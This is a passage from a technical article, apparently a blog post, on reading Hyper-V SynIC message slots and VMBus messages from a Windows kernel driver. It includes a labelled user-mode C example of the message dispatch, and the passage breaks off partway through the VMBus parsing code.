<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PrintCpuidInterceptMessage(phvMessage);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">break</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">case</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HvMessageTypeX64ExceptionIntercept:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PrintExceptionInterceptMessage(phvMessage);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">break</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">default</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Unknown MessageType"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, phvMessage->Header.MessageType);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">break</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The function gets the number of the active logical processor and the address of its SIM page, reads the message in SIM slot 0 and first analyzes the message type phvMessage->Header.MessageType, because the message body is different for each type. In DbgView you can see the following picture:</span></div>
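<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The same dispatch, as an added user-mode example that is not code from the article or from the driver it describes: it runs the message-type switch over every slot of a constructed SIM page instead of reading the real SIMP page from a kernel driver. The HV_MESSAGE layout (16-byte header, 240-byte payload, 256 bytes per slot, one slot per SINT) and the HvMessageType* values are the TLFS definitions; PostMessageToSlot is a hypothetical stand-in for the hypervisor's delivery that models the slot-busy / MessagePending rule, and SimScanResult, ScanSimPage and SimSlot are names chosen here. Two details a handler should get right are shown: PayloadSize is bounds-checked before the payload is touched, and a consumed slot is released by writing HvMessageTypeNone (the EOM MSR write that a real driver performs afterwards has no user-mode equivalent).</span></div>

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* TLFS sizes: the 4 KiB SIM page holds one 256-byte HV_MESSAGE per SINT (slot n = SINTn). */
#define HV_PAGE_SIZE                  4096u
#define HV_MESSAGE_SIZE               256u
#define HV_MESSAGE_PAYLOAD_BYTE_COUNT 240u
#define HV_SYNIC_SINT_COUNT           16u
#define HV_MESSAGE_FLAG_PENDING       0x01u
/* HV_MESSAGE_TYPE values as listed in the TLFS. */
enum {
    HvMessageTypeNone                  = 0x00000000u,
    HvMessageTypeX64IoPortIntercept    = 0x80010000u,
    HvMessageTypeX64MsrIntercept       = 0x80010001u,
    HvMessageTypeX64CpuidIntercept     = 0x80010002u,
    HvMessageTypeX64ExceptionIntercept = 0x80010003u
};

#pragma pack(push, 1)
typedef struct {
    uint32_t MessageType;
    uint8_t  PayloadSize;   /* valid bytes in Payload, at most 240 */
    uint8_t  MessageFlags;  /* bit 0 = MessagePending */
    uint8_t  Reserved[2];
    uint64_t Sender;        /* HV_PARTITION_ID or HV_PORT_ID */
} HV_MESSAGE_HEADER;
typedef struct {
    HV_MESSAGE_HEADER Header;
    uint8_t           Payload[HV_MESSAGE_PAYLOAD_BYTE_COUNT];
} HV_MESSAGE;
#pragma pack(pop)
_Static_assert(sizeof(HV_MESSAGE) == HV_MESSAGE_SIZE, "HV_MESSAGE must be 256 bytes");

typedef struct {
    unsigned handled;   /* dispatched to a known intercept handler */
    unsigned unknown;   /* occupied slot with a type we do not handle */
    unsigned rejected;  /* PayloadSize larger than the payload area */
} SimScanResult;

static HV_MESSAGE *SimSlot(uint8_t *simPage, unsigned sint)
{
    return (HV_MESSAGE *)(simPage + (size_t)sint * HV_MESSAGE_SIZE);
}

/* Hypothetical stand-in for hypervisor delivery: a slot is free only while its
 * MessageType is HvMessageTypeNone; otherwise MessagePending is set and the message
 * must be re-sent after end-of-message. Returns 0 = delivered, 1 = busy, -1 = bad argument. */
int PostMessageToSlot(uint8_t *simPage, unsigned sint, uint32_t type, const void *payload, uint8_t size)
{
    if (sint >= HV_SYNIC_SINT_COUNT || size > HV_MESSAGE_PAYLOAD_BYTE_COUNT || type == HvMessageTypeNone)
        return -1;
    HV_MESSAGE *m = SimSlot(simPage, sint);
    if (m->Header.MessageType != HvMessageTypeNone) {
        m->Header.MessageFlags |= HV_MESSAGE_FLAG_PENDING;
        return 1;
    }
    memset(m, 0, sizeof *m);
    m->Header.PayloadSize = size;
    if (size) memcpy(m->Payload, payload, size);
    m->Header.MessageType = type;   /* written last: this publishes the slot */
    return 0;
}

/* The dispatch from the handler above, applied to every SINT slot. A consumed slot is
 * released by writing HvMessageTypeNone; in a real driver the EOM MSR write that follows
 * is what lets the hypervisor deliver a pending message. */
SimScanResult ScanSimPage(uint8_t *simPage)
{
    SimScanResult r = {0, 0, 0};
    for (unsigned sint = 0; sint < HV_SYNIC_SINT_COUNT; sint++) {
        HV_MESSAGE *m = SimSlot(simPage, sint);
        uint32_t type = m->Header.MessageType;
        if (type == HvMessageTypeNone) continue;   /* empty slot */
        if (m->Header.PayloadSize > HV_MESSAGE_PAYLOAD_BYTE_COUNT) {
            r.rejected++;                          /* bounds-check before reading Payload */
        } else {
            switch (type) {
            case HvMessageTypeX64IoPortIntercept: case HvMessageTypeX64MsrIntercept:
            case HvMessageTypeX64CpuidIntercept:  case HvMessageTypeX64ExceptionIntercept:
                printf("SINT%u: intercept 0x%08x, %u payload bytes\n", sint, (unsigned)type, m->Header.PayloadSize);
                r.handled++;
                break;
            default:
                printf("SINT%u: unknown MessageType 0x%08x\n", sint, (unsigned)type);
                r.unknown++;
                break;
            }
        }
        m->Header.MessageType = HvMessageTypeNone;   /* release the slot */
    }
    return r;
}

int main(void)
{
    static uint8_t simPage[HV_PAGE_SIZE];   /* constructed stand-in for the SIMP page */
    PostMessageToSlot(simPage, 0, HvMessageTypeX64IoPortIntercept, "\x60\x00", 2); /* constructed payload */
    PostMessageToSlot(simPage, 2, HvMessageTypeX64MsrIntercept, NULL, 0);
    SimScanResult r = ScanSimPage(simPage);
    printf("handled=%u unknown=%u rejected=%u\n", r.handled, r.unknown, r.rejected);
    return 0;
}
```

<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Build it with any C11 compiler (for example gcc -std=c11). A second ScanSimPage call on the same page returns all zeros, because every slot was released on the first pass; a second PostMessageToSlot into an occupied slot returns 1 and sets the MessagePending flag, which is the condition the EOM handshake exists to resolve.</span></div>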
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="68" src="https://lh3.googleusercontent.com/f2XUN171nPLbcZCjvbovH9aqhJYfH6eAptCj41wnfHXakLcA-o4lyiuzHt9ZKUD3e5g0RBphAlI3VqE0gAXamPeYLFSUp_b_WqX1QhCUCzVqf8d-wTR4ubk0pqip2A5bmgmv-jumjCOyIc_I" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="483" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">void</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ParseVmbusMessage(</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">size_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: grey; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">index</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">get the number of the active logical processor</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ULONG</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> uCurProcNum = KeGetCurrentProcessorNumberEx(</span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NULL</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PHV_MESSAGE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> phvMessage4;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PVMBUS_MESSAGE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> pvmbMessage;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (pvSIMP[uCurProcNum] != </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NULL</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">get the pointer to SIM slot 4 (the SINT4 message)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">phvMessage4 = (</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PHV_MESSAGE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)((</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PUINT8</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)pvSIMP[uCurProcNum] + </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_MESSAGE_SIZE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> * 4);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//DbgLog("Hv interrupt vector index", index);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if the message type is not HvMessageTypeNone, the Payload contains the vmbus message</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (phvMessage4->Header.MessageType != HvMessageTypeNone){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pvmbMessage = (</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PVMBUS_MESSAGE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)phvMessage4->Payload;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">analyze the message and perform the vmbus type parsing</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">the structures of the vmbus messages are described in LIS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">switch</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (pvmbMessage->vmbHeader.msgtype)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">case</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> CHANNELMSG_GPADL_HEADER:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ParseGpadlHeaderMessage(pvmbMessage);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
